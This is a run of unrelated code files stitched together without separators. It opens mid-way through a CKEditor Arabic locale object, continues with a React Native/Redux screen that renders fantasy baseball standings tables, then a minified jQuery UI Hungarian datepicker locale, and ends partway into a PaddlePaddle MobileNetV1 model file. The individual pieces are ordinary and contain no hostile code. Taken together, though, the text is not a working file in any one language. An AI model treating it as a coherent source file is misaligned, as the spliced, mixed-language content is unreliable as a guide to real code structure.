أفقياً","splitVertical":"تقسيم الخلية عمودياً","title":"خصائص الخلية","cellType":"نوع الخلية","rowSpan":"امتداد الصفوف","colSpan":"امتداد الأعمدة","wordWrap":"التفاف النص","hAlign":"محاذاة أفقية","vAlign":"محاذاة رأسية","alignBaseline":"خط القاعدة","bgColor":"لون الخلفية","borderColor":"لون الحدود","data":"بيانات","header":"عنوان","yes":"نعم","no":"لا","invalidWidth":"عرض الخلية يجب أن يكون عدداً.","invalidHeight":"ارتفاع الخلية يجب أن يكون عدداً.","invalidRowSpan":"امتداد الصفوف يجب أن يكون عدداً صحيحاً.","invalidColSpan":"امتداد الأعمدة يجب أن يكون عدداً صحيحاً.","chooseColor":"اختر"},"cellPad":"المسافة البادئة","cellSpace":"تباعد الخلايا","column":{"menu":"عمود","insertBefore":"إدراج عمود قبل","insertAfter":"إدراج عمود بعد","deleteColumn":"حذف أعمدة"},"columns":"أعمدة","deleteTable":"حذف الجدول","headers":"العناوين","headersBoth":"كلاهما","headersColumn":"العمود الأول","headersNone":"بدون","headersRow":"الصف الأول","heightUnit":"height unit","invalidBorder":"حجم الحد يجب أن يكون عدداً.","invalidCellPadding":"المسافة البادئة يجب أن تكون عدداً","invalidCellSpacing":"المسافة بين الخلايا يجب أن تكون عدداً.","invalidCols":"عدد الأعمدة يجب أن يكون عدداً أكبر من صفر.","invalidHeight":"ارتفاع الجدول يجب أن يكون عدداً.","invalidRows":"عدد الصفوف يجب أن يكون عدداً أكبر من صفر.","invalidWidth":"عرض الجدول يجب أن يكون عدداً.","menu":"خصائص الجدول","row":{"menu":"صف","insertBefore":"إدراج صف قبل","insertAfter":"إدراج صف بعد","deleteRow":"حذف صفوف"},"rows":"صفوف","summary":"الخلاصة","title":"خصائص الجدول","toolbar":"جدول","widthPc":"بالمئة","widthPx":"بكسل","widthUnit":"وحدة العرض"},"stylescombo":{"label":"أنماط","panelTitle":"أنماط التنسيق","panelTitle1":"أنماط الفقرة","panelTitle2":"أنماط مضمنة","panelTitle3":"أنماط الكائن"},"specialchar":{"options":"خيارات الأحرف الخاصة","title":"اختر حرف خاص","toolbar":"إدراج حرف خاص"},"sourcearea":{"toolbar":"المصدر"},"scayt":{"btn_about":"عن SCAYT","btn_dictionaries":"قواميس","btn_disable":"تعطيل SCAYT","btn_enable":"تفعيل SCAYT","btn_langs":"لغات","btn_options":"خيارات","text_title":"تدقيق إملائي أثناء الكتابة"},"removeformat":{"toolbar":"إزالة التنسيقات"},"pastetext":{"button":"لصق كنص بسيط","pasteNotification":"Press %1 to paste. Your browser doesn‘t support pasting with the toolbar button or context menu option.","title":"لصق كنص بسيط"},"pastefromword":{"confirmCleanup":"يبدو أن النص المراد لصقه منسوخ من برنامج وورد. هل تود تنظيفه قبل الشروع في عملية اللصق؟","error":"لم يتم مسح المعلومات الملصقة لخلل داخلي","title":"لصق من وورد","toolbar":"لصق من وورد"},"notification":{"closed":"Notification closed."},"maximize":{"maximize":"تكبير","minimize":"تصغير"},"magicline":{"title":"إدراج فقرة هنا"},"list":{"bulletedlist":"ادخال/حذف تعداد نقطي","numberedlist":"ادخال/حذف تعداد رقمي"},"link":{"acccessKey":"مفاتيح الإختصار","advanced":"متقدم","advisoryContentType":"نوع التقرير","advisoryTitle":"عنوان التقرير","anchor":{"toolbar":"إشارة مرجعية","menu":"تحرير الإشارة المرجعية","title":"خصائص الإشارة المرجعية","name":"اسم الإشارة المرجعية","errorName":"الرجاء كتابة اسم الإشارة المرجعية","remove":"إزالة الإشارة المرجعية"},"anchorId":"حسب رقم العنصر","anchorName":"حسب إسم الإشارة المرجعية","charset":"ترميز المادة المطلوبة","cssClasses":"فئات التنسيق","download":"فرض التحميل","displayText":"نص العرض","emailAddress":"البريد الإلكتروني","emailBody":"محتوى الرسالة","emailSubject":"موضوع الرسالة","id":"هوية","info":"معلومات الرابط","langCode":"رمز اللغة","langDir":"إتجاه نص اللغة","langDirLTR":"اليسار لليمين (LTR)","langDirRTL":"اليمين لليسار (RTL)","menu":"تحرير الرابط","name":"إسم","noAnchors":"(لا توجد علامات مرجعية في هذا المستند)","noEmail":"الرجاء كتابة الريد الإلكتروني","noUrl":"الرجاء كتابة رابط الموقع","noTel":"Please type the phone number","other":"<أخرى>","phoneNumber":"Phone number","popupDependent":"تابع (Netscape)","popupFeatures":"خصائص النافذة المنبثقة","popupFullScreen":"ملئ الشاشة (IE)","popupLeft":"التمركز لليسار","popupLocationBar":"شريط العنوان","popupMenuBar":"القوائم الرئيسية","popupResizable":"قابلة التشكيل","popupScrollBars":"أشرطة التمرير","popupStatusBar":"شريط الحالة","popupToolbar":"شريط الأدوات","popupTop":"التمركز للأعلى","rel":"العلاقة","selectAnchor":"اختر علامة مرجعية","styles":"نمط","tabIndex":"الترتيب","target":"هدف الرابط","targetFrame":"<إطار>","targetFrameName":"اسم الإطار المستهدف","targetPopup":"<نافذة منبثقة>","targetPopupName":"اسم النافذة المنبثقة","title":"رابط","toAnchor":"مكان في هذا المستند","toEmail":"بريد إلكتروني","toUrl":"الرابط","toPhone":"Phone","toolbar":"رابط","type":"نوع الربط","unlink":"إزالة رابط","upload":"رفع"},"indent":{"indent":"زيادة المسافة البادئة","outdent":"إنقاص المسافة البادئة"},"image":{"alt":"عنوان الصورة","border":"سمك الحدود","btnUpload":"أرسلها للخادم","button2Img":"هل تريد تحويل زر الصورة المختار إلى صورة بسيطة؟","hSpace":"تباعد أفقي","img2Button":"هل تريد تحويل الصورة المختارة إلى زر صورة؟","infoTab":"معلومات الصورة","linkTab":"الرابط","lockRatio":"تناسق الحجم","menu":"خصائص الصورة","resetSize":"إستعادة الحجم الأصلي","title":"خصائص الصورة","titleButton":"خصائص زر الصورة","upload":"رفع","urlMissing":"عنوان مصدر الصورة مفقود","vSpace":"تباعد عمودي","validateBorder":"الإطار يجب أن يكون عددا","validateHSpace":"HSpace يجب أن يكون عدداً.","validateVSpace":"VSpace يجب أن يكون عدداً."},"horizontalrule":{"toolbar":"خط فاصل"},"format":{"label":"تنسيق","panelTitle":"تنسيق الفقرة","tag_address":"عنوان","tag_div":"عادي (DIV)","tag_h1":"العنوان 1","tag_h2":"العنوان 2","tag_h3":"العنوان 3","tag_h4":"العنوان 4","tag_h5":"العنوان 5","tag_h6":"العنوان 6","tag_p":"عادي","tag_pre":"منسّق"},"filetools":{"loadError":"Error occurred during file read.","networkError":"Network error occurred during file upload.","httpError404":"HTTP error occurred during file upload (404: File not found).","httpError403":"HTTP error occurred during file upload (403: Forbidden).","httpError":"HTTP error occurred during file upload (error status: %1).","noUrlError":"Upload URL is not defined.","responseError":"Incorrect server response."},"fakeobjects":{"anchor":"إرساء","flash":"رسم متحرك بالفلاش","hiddenfield":"إدراج حقل خفي","iframe":"iframe","unknown":"عنصر غير معروف"},"elementspath":{"eleLabel":"مسار العنصر","eleTitle":"عنصر 1%"},"contextmenu":{"options":"خصائص قائمة السياق"},"clipboard":{"copy":"نسخ","copyError":"الإعدادات الأمنية للمتصفح الذي تستخدمه تمنع عمليات النسخ التلقائي. فضلاً إستخدم لوحة المفاتيح لفعل ذلك (Ctrl/Cmd+C).","cut":"قص","cutError":"الإعدادات الأمنية للمتصفح الذي تستخدمه تمنع القص التلقائي. فضلاً إستخدم لوحة المفاتيح لفعل ذلك (Ctrl/Cmd+X).","paste":"لصق","pasteNotification":"اضغط %1 للصق. اللصق عن طريق شريط الادوات او القائمة غير مدعوم من المتصفح المستخدم من قبلك.","pasteArea":"منطقة اللصق","pasteMsg":"الصق المحتوى بداخل المساحة المخصصة ادناه ثم اضغط على OK"},"blockquote":{"toolbar":"اقتباس"},"basicstyles":{"bold":"عريض","italic":"مائل","strike":"يتوسطه خط","subscript":"منخفض","superscript":"مرتفع","underline":"تسطير"},"about":{"copy":"حقوق النشر &copy; $1. جميع الحقوق محفوظة.","dlgTitle":"عن CKEditor","moreInfo":"للحصول على معلومات الترخيص ، يرجى زيارة موقعنا:"},"editor":"محرر النص الغني","editorPanel":"لائحة محرر النص المنسق","common":{"editorHelp":"إضغط على ALT + 0 للحصول على المساعدة.","browseServer":"تصفح","url":"الرابط","protocol":"البروتوكول","upload":"رفع","uploadSubmit":"أرسل","image":"صورة","flash":"فلاش","form":"نموذج","checkbox":"خانة إختيار","radio":"زر اختيار","textField":"مربع نص","textarea":"مساحة نصية","hiddenField":"إدراج حقل خفي","button":"زر ضغط","select":"اختار","imageButton":"زر صورة","notSet":"<بدون تحديد>","id":"الرقم","name":"إسم","langDir":"إتجاه النص","langDirLtr":"اليسار لليمين (LTR)","langDirRtl":"اليمين لليسار (RTL)","langCode":"رمز اللغة","longDescr":"الوصف التفصيلى","cssClass":"فئات التنسيق","advisoryTitle":"عنوان التقرير","cssStyle":"نمط","ok":"موافق","cancel":"إلغاء الأمر","close":"أغلق","preview":"استعراض","resize":"تغيير الحجم","generalTab":"عام","advancedTab":"متقدم","validateNumberFailed":"لايوجد نتيجة","confirmNewPage":"ستفقد أي متغييرات اذا لم تقم بحفظها اولا. هل أنت متأكد أنك تريد صفحة جديدة؟","confirmCancel":"بعض الخيارات قد تغيرت. هل أنت متأكد من إغلاق مربع النص؟","options":"خيارات","target":"هدف الرابط","targetNew":"نافذة جديدة","targetTop":"النافذة الأعلى","targetSelf":"داخل النافذة","targetParent":"النافذة الأم","langDirLTR":"اليسار لليمين (LTR)","langDirRTL":"اليمين لليسار (RTL)","styles":"نمط","cssClasses":"فئات التنسيق","width":"العرض","height":"الإرتفاع","align":"محاذاة","left":"يسار","right":"يمين","center":"وسط","justify":"ضبط","alignLeft":"محاذاة إلى اليسار","alignRight":"محاذاة إلى اليمين","alignCenter":"Align Center","alignTop":"أعلى","alignMiddle":"وسط","alignBottom":"أسفل","alignNone":"None","invalidValue":"قيمة غير مفبولة.","invalidHeight":"الارتفاع يجب أن يكون عدداً.","invalidWidth":"العرض يجب أن يكون عدداً.","invalidLength":"Value specified for the \"%1\" field must be a positive number with or without a valid measurement unit (%2).","invalidCssLength":"قيمة الخانة المخصصة لـ \"%1\" يجب أن تكون رقما موجبا، باستخدام أو من غير استخدام وحدة CSS قياس مقبولة (px, %, in, cm, mm, em, ex, pt, or pc).","invalidHtmlLength":"قيمة الخانة المخصصة لـ \"%1\" يجب أن تكون رقما موجبا، باستخدام أو من غير استخدام وحدة HTML قياس مقبولة (px or %).","invalidInlineStyle":"قيمة الخانة المخصصة لـ Inline Style يجب أن تختوي على مجموع واحد أو أكثر بالشكل التالي: \"name : value\", مفصولة بفاصلة منقزطة.","cssLengthTooltip":"أدخل رقما للقيمة بالبكسل أو رقما بوحدة CSS مقبولة (px, %, in, cm, mm, em, ex, pt, or pc).","unavailable":"%1<span class=\"cke_accessibility\">, غير متاح</span>","keyboard":{"8":"Backspace","13":"Enter","16":"Shift","17":"Ctrl","18":"Alt","32":"Space","35":"End","36":"Home","46":"Delete","112":"F1","113":"F2","114":"F3","115":"F4","116":"F5","117":"F6","118":"F7","119":"F8","120":"F9","121":"F10","122":"F11","123":"F12","124":"F13","125":"F14","126":"F15","127":"F16","128":"F17","129":"F18","130":"F19","131":"F20","132":"F21","133":"F22","134":"F23","135":"F24","224":"Command"},"keyboardShortcut":"Keyboard shortcut","optionDefault":"Default"}};
import React, { PureComponent } from "react"; import { View, Text } from "react-native"; import { connect } from "react-redux"; import { Row, Rows } from "../components/Row"; import { LinkText } from "../components/LinkText"; import { Navbar } from "../components/Navbar"; import { LoadingIndicator } from "../components/LoadingIndicator"; import { StandingsDropdownPre2019 } from "../components/StandingsDropdownPre2019"; import { StandingsDropdownPost2019 } from "../components/StandingsDropdownPost2019"; import { getBaseballStandingsStateSelectors } from "../store/baseballStandings/baseballStandingsReducer"; import { scrapeBaseballStandings, displayBaseballStandings, sortTable, } from "../store/baseballStandings/baseballStandingsActions"; import { tableDefaultSortDirections } from "../consts/tableDefaultSortDirections/baseballStandings"; import { sortArrayBy, isYear1BeforeYear2, isEmptyArray } from "../utils/"; import { returnMongoCollection } from "../databaseManagement"; import { standingsStyles as styles } from "../styles/globalStyles"; class BaseballStandings extends PureComponent { constructor(props) { super(props); this.state = { year: null, currentYear: null, seasonStarted: null, inSeason: null, trifectaStandings: { sortedColumn: null, highToLow: null, }, h2hStandings: { sortedColumn: "h2hTrifectaPoints", highToLow: true, }, rotoStandings: { sortedColumn: "rotoTrifectaPoints", highToLow: true, }, rotoStats: { sortedColumn: "teamName", highToLow: true, }, }; } componentDidMount() { this.retrieveData(); } componentDidUpdate(prevProps, prevState) { const year = this.props.navigation.getParam("year", "No year was defined!"); this.setState({ year, }); if (prevState.year !== this.state.year) { this.retrieveData(); } } retrieveData = async () => { const { lastScraped, navigation } = this.props; const year = navigation.getParam("year", "No year was defined!"); const seasonVariablesCollection = await returnMongoCollection( "seasonVariables" ); seasonVariablesCollection .find({}, { projection: { _id: 0 } }) .asArray() .then((seasonVariables) => { const { currentYear } = seasonVariables[0]; const { seasonStarted, inSeason } = seasonVariables[0].baseball; const { scrapeBaseballStandings, displayBaseballStandings, } = this.props; if (isYear1BeforeYear2(year, currentYear)) { displayBaseballStandings(year); } else { const defaultSortColumn = inSeason ? "trifectaPoints" : "totalTrifectaPoints"; this.setState({ currentYear, seasonStarted, inSeason, trifectaStandings: { sortedColumn: defaultSortColumn, highToLow: true, }, }); if (seasonStarted) { if (inSeason && !lastScraped) { scrapeBaseballStandings(year); } else { displayBaseballStandings(year, defaultSortColumn); } } } }); }; sortTableByColumn = (tableArray, columnKey, tableType) => { const { sortTable } = this.props; const { sortedColumn, highToLow } = this.state[tableType]; const tableArraySorted = [...tableArray]; if (sortedColumn === columnKey) { this.setState({ [tableType]: { sortedColumn: columnKey, highToLow: !highToLow, }, }); sortTable([ sortArrayBy(tableArraySorted, columnKey, !highToLow), tableType, ]); } else { const columnDefaultSortDirection = tableDefaultSortDirections[tableType][columnKey]; this.setState({ [tableType]: { sortedColumn: columnKey, highToLow: columnDefaultSortDirection, }, }); sortTable([ sortArrayBy(tableArraySorted, columnKey, columnDefaultSortDirection), tableType, ]); } }; noop = () => {}; // Trifecta Standings Table sort methods sortTrifectaStandingsbyH2HPoints = () => { const { trifectaStandings } = this.props; this.sortTableByColumn( trifectaStandings, "h2hTrifectaPoints", "trifectaStandings" ); }; sortTrifectaStandingsByRotoPoints = () => { const { trifectaStandings } = this.props; this.sortTableByColumn( trifectaStandings, "rotoTrifectaPoints", "trifectaStandings" ); }; sortTrifectaStandingsByTrifectaPoints = () => { const { trifectaStandings } = this.props; this.sortTableByColumn( trifectaStandings, "trifectaPoints", "trifectaStandings" ); }; sortTrifectaStandingsByPlayoffPoints = () => { const { trifectaStandings } = this.props; this.sortTableByColumn( trifectaStandings, "playoffPoints", "trifectaStandings" ); }; sortTrifectaStandingsByTotalTrifectaPoints = () => { const { trifectaStandings } = this.props; this.sortTableByColumn( trifectaStandings, "totalTrifectaPoints", "trifectaStandings" ); }; // H2H Standings Table sort methods sortH2HStandingsByWins = () => { const { h2hStandings } = this.props; this.sortTableByColumn(h2hStandings, "wins", "h2hStandings"); }; sortH2HStandingsByLosses = () => { const { h2hStandings } = this.props; this.sortTableByColumn(h2hStandings, "losses", "h2hStandings"); }; sortH2HStandingsByTies = () => { const { h2hStandings } = this.props; this.sortTableByColumn(h2hStandings, "ties", "h2hStandings"); }; sortH2HStandingsByWinPer = () => { const { h2hStandings } = this.props; this.sortTableByColumn(h2hStandings, "winPer", "h2hStandings"); }; sortH2HStandingsByTrifectaPoints = () => { const { h2hStandings } = this.props; this.sortTableByColumn(h2hStandings, "h2hTrifectaPoints", "h2hStandings"); }; // Roto Standings Table sort methods sortRotoStandingsByRPoints = () => { const { rotoStandings } = this.props; this.sortTableByColumn(rotoStandings, "RPoints", "rotoStandings"); }; sortRotoStandingsByHRPoints = () => { const { rotoStandings } = this.props; this.sortTableByColumn(rotoStandings, "HRPoints", "rotoStandings"); }; sortRotoStandingsByRBIPoints = () => { const { rotoStandings } = this.props; this.sortTableByColumn(rotoStandings, "RBIPoints", "rotoStandings"); }; sortRotoStandingsByKPoints = () => { const { rotoStandings } = this.props; this.sortTableByColumn(rotoStandings, "KPoints", "rotoStandings"); }; sortRotoStandingsBySBPoints = () => { const { rotoStandings } = this.props; this.sortTableByColumn(rotoStandings, "SBPoints", "rotoStandings"); }; sortRotoStandingsByOBPPoints = () => { const { rotoStandings } = this.props; this.sortTableByColumn(rotoStandings, "OBPPoints", "rotoStandings"); }; sortRotoStandingsBySOPoints = () => { const { rotoStandings } = this.props; this.sortTableByColumn(rotoStandings, "SOPoints", "rotoStandings"); }; sortRotoStandingsByQSPoints = () => { const { rotoStandings } = this.props; this.sortTableByColumn(rotoStandings, "QSPoints", "rotoStandings"); }; sortRotoStandingsByWPoints = () => { const { rotoStandings } = this.props; this.sortTableByColumn(rotoStandings, "WPoints", "rotoStandings"); }; sortRotoStandingsBySVPoints = () => { const { rotoStandings } = this.props; this.sortTableByColumn(rotoStandings, "SVPoints", "rotoStandings"); }; sortRotoStandingsByERAPoints = () => { const { rotoStandings } = this.props; this.sortTableByColumn(rotoStandings, "ERAPoints", "rotoStandings"); }; sortRotoStandingsByWHIPPoints = () => { const { rotoStandings } = this.props; this.sortTableByColumn(rotoStandings, "WHIPPoints", "rotoStandings"); }; sortRotoStandingsByRotoPoints = () => { const { rotoStandings } = this.props; this.sortTableByColumn(rotoStandings, "totalPoints", "rotoStandings"); }; sortRotoStandingsByTrifectaPoints = () => { const { rotoStandings } = this.props; this.sortTableByColumn( rotoStandings, "rotoTrifectaPoints", "rotoStandings" ); }; // Roto Stats Table sort methods sortRotoStandingsByR = () => { const { rotoStats } = this.props; this.sortTableByColumn(rotoStats, "R", "rotoStats"); }; sortRotoStandingsByHR = () => { const { rotoStats } = this.props; this.sortTableByColumn(rotoStats, "HR", "rotoStats"); }; sortRotoStandingsByRBI = () => { const { rotoStats } = this.props; this.sortTableByColumn(rotoStats, "RBI", "rotoStats"); }; sortRotoStandingsByK = () => { const { rotoStats } = this.props; this.sortTableByColumn(rotoStats, "K", "rotoStats"); }; sortRotoStandingsBySB = () => { const { rotoStats } = this.props; this.sortTableByColumn(rotoStats, "SB", "rotoStats"); }; sortRotoStandingsByOBP = () => { const { rotoStats } = this.props; this.sortTableByColumn(rotoStats, "OBP", "rotoStats"); }; sortRotoStandingsBySO = () => { const { rotoStats } = this.props; this.sortTableByColumn(rotoStats, "SO", "rotoStats"); }; sortRotoStandingsByQS = () => { const { rotoStats } = this.props; this.sortTableByColumn(rotoStats, "QS", "rotoStats"); }; sortRotoStandingsByW = () => { const { rotoStats } = this.props; this.sortTableByColumn(rotoStats, "W", "rotoStats"); }; sortRotoStandingsBySV = () => { const { rotoStats } = this.props; this.sortTableByColumn(rotoStats, "SV", "rotoStats"); }; sortRotoStandingsByERA = () => { const { rotoStats } = this.props; this.sortTableByColumn(rotoStats, "ERA", "rotoStats"); }; sortRotoStandingsByWHIP = () => { const { rotoStats } = this.props; this.sortTableByColumn(rotoStats, "WHIP", "rotoStats"); }; renderHeaderRowColumn = ({ title, onPress }) => { return ( <LinkText key={title} title={title} onPress={onPress} textStyles={styles.headerText} /> ); }; renderStandingsDropdown = () => { const { navigation } = this.props; const year = navigation.getParam("year", "No year was defined!"); if (isYear1BeforeYear2(year, "2019")) { const year1 = (Number(year) - 1).toString(); return ( <StandingsDropdownPre2019 navigation={navigation} year1={year1} year2={year.toString()} /> ); } return ( <StandingsDropdownPost2019 navigation={navigation} year={year} currentYear={this.state.currentYear} /> ); }; render() { const { navigation, trifectaStandings, h2hStandings, rotoStandings, rotoStats, } = this.props; const { seasonStarted, inSeason } = this.state; if (seasonStarted === false) { return ( <View> <Text>Not in season yet!</Text> </View> ); } if ( isEmptyArray(h2hStandings) || isEmptyArray(rotoStandings) || isEmptyArray(rotoStats) || isEmptyArray(trifectaStandings) ) { return <LoadingIndicator />; } ///// Trifecta Standings ///// const trifectaStandingsHeaderRowHeight = 75; const trifectaStandingsTotalHeight = 500; const trifectaStandingsTotalWidth = inSeason ? 700 : 900; const trifectaStandingsWidthArray = [200, 200, 100, 100, 100]; const trifectaStandingsObjectKeys = [ "teamName", "ownerNames", "h2hTrifectaPoints", "rotoTrifectaPoints", "trifectaPoints", ]; // Create header row for Trifecta Standings Table const trifectaStandingsHeaderRowMap = [ { title: "Team Name", onPress: this.noop }, { title: "Owner(s)", onPress: this.noop }, { title: "H2H Trifecta Points", onPress: this.sortTrifectaStandingsbyH2HPoints, }, { title: "Roto Trifecta Points", onPress: this.sortTrifectaStandingsByRotoPoints, }, { title: "Regular Season Trifecta Points", onPress: this.sortTrifectaStandingsByTrifectaPoints, }, ]; if (!inSeason) { trifectaStandingsWidthArray.push(100, 100); trifectaStandingsObjectKeys.push("playoffPoints", "totalTrifectaPoints"); trifectaStandingsHeaderRowMap.push( { title: "Playoff Points", onPress: this.sortTrifectaStandingsByPlayoffPoints, }, { title: "Total Trifecta Points", onPress: this.sortTrifectaStandingsByTotalTrifectaPoints, } ); } const trifectaStandingsHeaderRow = trifectaStandingsHeaderRowMap.map( this.renderHeaderRowColumn ); ///// H2H Standings ///// const h2hStandingsHeaderRowHeight = 75; const h2hStandingsTotalHeight = 500; const h2hStandingsTotalWidth = 700; const h2hStandingsWidthArray = [200, 100, 100, 100, 100, 100]; const h2hStandingsObjectKeys = [ "teamName", "wins", "losses", "ties", "winPer", "h2hTrifectaPoints", ]; // Create header row for H2H Standings Table const h2hStandingsHeaderRowMap = [ { title: "Team Name", onPress: this.noop }, { title: "Wins", onPress: this.sortH2HStandingsByWins }, { title: "Losses", onPress: this.sortH2HStandingsByLosses }, { title: "Ties", onPress: this.sortH2HStandingsByTies }, { title: "Win %", onPress: this.sortH2HStandingsByWinPer }, { title: "H2H Trifecta Points", onPress: this.sortH2HStandingsByTrifectaPoints, }, ]; const h2hStandingsHeaderRow = h2hStandingsHeaderRowMap.map( this.renderHeaderRowColumn ); ///// ROTO STANDINGS ///// const rotoStandingsHeaderRowHeight = 75; const rotoStandingsTotalHeight = 500; const rotoStandingsTotalWidth = 1250; const rotoStandingsWidthArray = [ 200, 75, 75, 75, 75, 75, 75, 75, 75, 75, 75, 75, 75, 75, 75, ]; const rotoStandingsObjectKeys = [ "teamName", "RPoints", "HRPoints", "RBIPoints", "KPoints", "SBPoints", "OBPPoints", "SOPoints", "QSPoints", "WPoints", "SVPoints", "ERAPoints", "WHIPPoints", "totalPoints", "rotoTrifectaPoints", ]; // Create header row for Roto Standings Table const rotoStandingsHeaderRowMap = [ { title: "Team Name", onPress: this.noop }, { title: "R", onPress: this.sortRotoStandingsByRPoints }, { title: "HR", onPress: this.sortRotoStandingsByHRPoints }, { title: "RBI", onPress: this.sortRotoStandingsByRBIPoints }, { title: "K", onPress: this.sortRotoStandingsByKPoints }, { title: "SB", onPress: this.sortRotoStandingsBySBPoints }, { title: "OBP", onPress: this.sortRotoStandingsByOBPPoints }, { title: "SO", onPress: this.sortRotoStandingsBySOPoints }, { title: "QS", onPress: this.sortRotoStandingsByQSPoints }, { title: "W", onPress: this.sortRotoStandingsByWPoints }, { title: "SV", onPress: this.sortRotoStandingsBySVPoints }, { title: "ERA", onPress: this.sortRotoStandingsByERAPoints }, { title: "WHIP", onPress: this.sortRotoStandingsByWHIPPoints }, { title: "Roto Points", onPress: this.sortRotoStandingsByRotoPoints }, { title: "Roto Trifecta Points", onPress: this.sortRotoStandingsByTrifectaPoints, }, ]; const rotoStandingsHeaderRow = rotoStandingsHeaderRowMap.map( this.renderHeaderRowColumn ); ///// ROTO STATS ///// const rotoStatsHeaderRowHeight = 75; const rotoStatsTotalHeight = 500; const rotoStatsTotalWidth = 1100; const rotoStatsWidthArray = [ 200, 75, 75, 75, 75, 75, 75, 75, 75, 75, 75, 75, 75, ]; const rotoStatsObjectKeys = [ "teamName", "R", "HR", "RBI", "K", "SB", "OBP", "SO", "QS", "W", "SV", "ERA", "WHIP", ]; const rotoStatsHeaderRowMap = [ { title: "Team Name", onPress: this.noop }, { title: "R", onPress: this.sortRotoStandingsByR }, { title: "HR", onPress: this.sortRotoStandingsByHR }, { title: "RBI", onPress: this.sortRotoStandingsByRBI }, { title: "K", onPress: this.sortRotoStandingsByK }, { title: "SB", onPress: this.sortRotoStandingsBySB }, { title: "OBP", onPress: this.sortRotoStandingsByOBP }, { title: "SO", onPress: this.sortRotoStandingsBySO }, { title: "QS", onPress: this.sortRotoStandingsByQS }, { title: "W", onPress: this.sortRotoStandingsByW }, { title: "SV", onPress: this.sortRotoStandingsBySV }, { title: "ERA", onPress: this.sortRotoStandingsByERA }, { title: "WHIP", onPress: this.sortRotoStandingsByWHIP }, ]; const rotoStatsHeaderRow = rotoStatsHeaderRowMap.map( this.renderHeaderRowColumn ); const year = navigation.getParam("year", "No year was defined!"); const title = `${year} Baseball Standings!`; return ( <View style={styles.container}> <Navbar navigation={navigation} /> <View style={styles.headerSection}> <View> <Text style={styles.title}>{title}</Text> {/* <Text>{lastScraped}</Text> */} </View> <View style={styles.dropdown}>{this.renderStandingsDropdown()}</View> </View> <View style={styles.tables}> <View style={styles.table}> <Text style={styles.subtext}>Trifecta Standings</Text> <Row data={trifectaStandingsHeaderRow} height={trifectaStandingsHeaderRowHeight} totalWidth={trifectaStandingsTotalWidth} widthArray={trifectaStandingsWidthArray} rowStyle={styles.header} /> <Rows data={trifectaStandings} totalheight={trifectaStandingsTotalHeight} totalwidth={trifectaStandingsTotalWidth} widthArray={trifectaStandingsWidthArray} objectKeys={trifectaStandingsObjectKeys} top3Styling /> </View> <View style={styles.table}> <Text style={styles.subtext}>H2H Standings</Text> <Row data={h2hStandingsHeaderRow} height={h2hStandingsHeaderRowHeight} totalwidth={h2hStandingsTotalWidth} widthArray={h2hStandingsWidthArray} rowStyle={styles.header} numberOfLines={2} /> <Rows data={h2hStandings} totalheight={h2hStandingsTotalHeight} totalwidth={h2hStandingsTotalWidth} widthArray={h2hStandingsWidthArray} objectKeys={h2hStandingsObjectKeys} /> </View> <View style={styles.table}> <Text style={styles.subtext}>Roto Standings</Text> <Row data={rotoStandingsHeaderRow} height={rotoStandingsHeaderRowHeight} totalwidth={rotoStandingsTotalWidth} widthArray={rotoStandingsWidthArray} rowStyle={styles.header} numberOfLines={2} /> <Rows data={rotoStandings} totalheight={rotoStandingsTotalHeight} totalwidth={rotoStandingsTotalWidth} widthArray={rotoStandingsWidthArray} objectKeys={rotoStandingsObjectKeys} numberOfLines={2} /> <View style={styles.table}> <Text style={styles.subtext}>Roto Stats</Text> <Row data={rotoStatsHeaderRow} height={rotoStatsHeaderRowHeight} totalwidth={rotoStatsTotalWidth} widthArray={rotoStatsWidthArray} rowStyle={styles.header} numberOfLines={2} /> <Rows data={rotoStats} totalheight={rotoStatsTotalHeight} totalwidth={rotoStatsTotalWidth} widthArray={rotoStatsWidthArray} objectKeys={rotoStatsObjectKeys} numberOfLines={2} /> </View> </View> </View> </View> ); } } const mapStateToProps = (state) => { const { getTrifectaStandings, getH2HStandings, getRotoStandings, getRotoStats, getLastScraped, } = getBaseballStandingsStateSelectors(state); return { lastScraped: getLastScraped(), trifectaStandings: getTrifectaStandings(), h2hStandings: getH2HStandings(), rotoStandings: getRotoStandings(), rotoStats: getRotoStats(), }; }; const mapDispatchToProps = { scrapeBaseballStandings, displayBaseballStandings, sortTable, }; export default connect(mapStateToProps, mapDispatchToProps)(BaseballStandings);
/*! jQuery UI - v1.10.4 - 2014-06-22 * http://jqueryui.com * Copyright 2014 jQuery Foundation and other contributors; Licensed MIT */ jQuery(function(t){t.datepicker.regional.hu={closeText:"bezár",prevText:"vissza",nextText:"előre",currentText:"ma",monthNames:["Január","Február","Március","Április","Május","Június","Július","Augusztus","Szeptember","Október","November","December"],monthNamesShort:["Jan","Feb","Már","Ápr","Máj","Jún","Júl","Aug","Szep","Okt","Nov","Dec"],dayNames:["Vasárnap","Hétfő","Kedd","Szerda","Csütörtök","Péntek","Szombat"],dayNamesShort:["Vas","Hét","Ked","Sze","Csü","Pén","Szo"],dayNamesMin:["V","H","K","Sze","Cs","P","Szo"],weekHeader:"Hét",dateFormat:"yy.mm.dd.",firstDay:1,isRTL:!1,showMonthAfterYear:!0,yearSuffix:""},t.datepicker.setDefaults(t.datepicker.regional.hu)});
# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np import paddle from paddle import ParamAttr import paddle.nn as nn import paddle.nn.functional as F from paddle.nn import Conv2D, BatchNorm, Linear, Dropout from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D from paddle.nn.initializer import KaimingNormal import math from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url MODEL_URLS = {"MobileNetV1_x0_25": "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MobileNetV1_x0_25_pretrained.pdparams", "MobileNetV1_x0_5": "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MobileNetV1_x0_5_pretrained.pdparams", "MobileNetV1_x0_75": "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MobileNetV1_x0_75_pretrained.pdparams", "MobileNetV1": "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MobileNetV1_pretrained.pdparams"} __all__ = list(MODEL_URLS.keys()) class ConvBNLayer(nn.Layer): def __init__(self, num_channels, filter_size, num_filters, stride, 